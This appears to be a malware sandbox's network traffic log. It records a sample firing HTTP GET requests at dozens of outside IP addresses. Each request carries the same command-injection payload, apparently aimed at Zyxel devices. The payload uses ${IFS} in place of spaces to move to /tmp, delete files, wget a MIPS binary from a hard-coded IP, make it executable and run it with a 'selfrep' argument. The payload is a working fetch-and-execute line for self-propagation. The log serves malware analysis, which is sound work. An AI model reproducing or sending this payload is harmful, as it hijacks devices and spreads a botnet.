                                            Feb 2, 2024 06:21:01.416558027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1558192.168.2.155945478.143.169.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.416577101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1559192.168.2.1534666136.62.196.84443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.416604996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1560192.168.2.155350039.231.246.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.416649103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1561192.168.2.1559020208.18.69.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.416682959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1562192.168.2.155854434.169.53.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.416728973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1563192.168.2.154385037.213.32.96443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.416729927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1564192.168.2.1557538138.235.34.119443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.416791916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1565192.168.2.1538800156.204.20.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.416802883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1566192.168.2.1555198174.194.23.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.416857958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1567192.168.2.1558890199.187.157.38443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.416893005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1568192.168.2.153408482.96.27.140443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.416930914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1569192.168.2.1533812145.181.129.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.416990042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1570192.168.2.1559774143.229.203.153443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.417020082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1571192.168.2.155495269.238.163.172443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.417069912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1572192.168.2.1550776157.234.247.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.417104006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1573192.168.2.1541028146.126.41.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.417134047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1574192.168.2.1549360140.157.213.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.417169094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1575192.168.2.1540506161.217.133.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.417207956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1576192.168.2.154167653.34.60.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.417227983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1577192.168.2.1543702176.176.99.115443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.417273045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1578192.168.2.1547418186.206.13.124443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.417331934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1579192.168.2.1541436152.138.58.53443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.417363882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1580192.168.2.1542612119.247.56.200443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.417407990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1581192.168.2.1545182130.26.170.185443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.417449951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1582192.168.2.155704671.92.17.105443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.417479992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1583192.168.2.154866873.69.241.107443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.417520046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1584192.168.2.1543946115.99.96.85443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.417536020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1585192.168.2.1545874186.53.214.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.417587042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1586192.168.2.155130078.172.145.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.417613029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1587192.168.2.1552652191.249.207.140443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.417649031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1588192.168.2.1557822179.153.93.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.417706966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1589192.168.2.1550172137.94.103.17443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.417762995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1590192.168.2.153915861.198.124.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.417778969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1591192.168.2.154520872.240.233.72443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.417834044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1592192.168.2.154852842.51.50.151443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.417870998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1593192.168.2.1546772205.197.159.123443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.417900085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1594192.168.2.1538120206.106.8.226443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.417932034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1595192.168.2.1559798141.229.228.204443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.417974949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1596192.168.2.1554080147.189.164.134443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.418020964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1597192.168.2.1550128206.200.225.119443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.418040991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1598192.168.2.1535562113.75.52.109443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.418088913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1599192.168.2.1548710197.192.167.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.418143988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1600192.168.2.1534962150.106.106.188443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.418183088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1601192.168.2.1537726178.11.190.109443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.418207884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1602192.168.2.155611235.46.142.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.418263912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1603192.168.2.154126477.4.35.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.418314934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1604192.168.2.1555170212.240.206.142443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.418345928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1605192.168.2.156070066.195.188.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.418385029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1606192.168.2.1559206136.168.104.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.418437004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1607192.168.2.1536652182.87.83.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.418467045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1608192.168.2.1541808181.217.36.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.418482065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1609192.168.2.153519289.111.136.188443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.418521881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1610192.168.2.153601466.38.80.2443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.418560028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1611192.168.2.155857043.237.129.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.418582916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1612192.168.2.1546556105.75.14.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.418632030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1613192.168.2.155952266.154.128.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.418658018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1614192.168.2.1554354199.138.255.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.422133923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1615192.168.2.1537962220.228.232.81443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.422163010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1616192.168.2.154367042.107.223.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.422208071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1617192.168.2.1532902105.94.226.229443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.422251940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1618192.168.2.155424634.84.109.164443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.422301054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1619192.168.2.154397277.220.91.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.422341108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1620192.168.2.1533624176.65.12.53443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:01.422379971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            1621192.168.2.1544776124.63.237.14443
                                            TimestampBytes transferredDirectionData
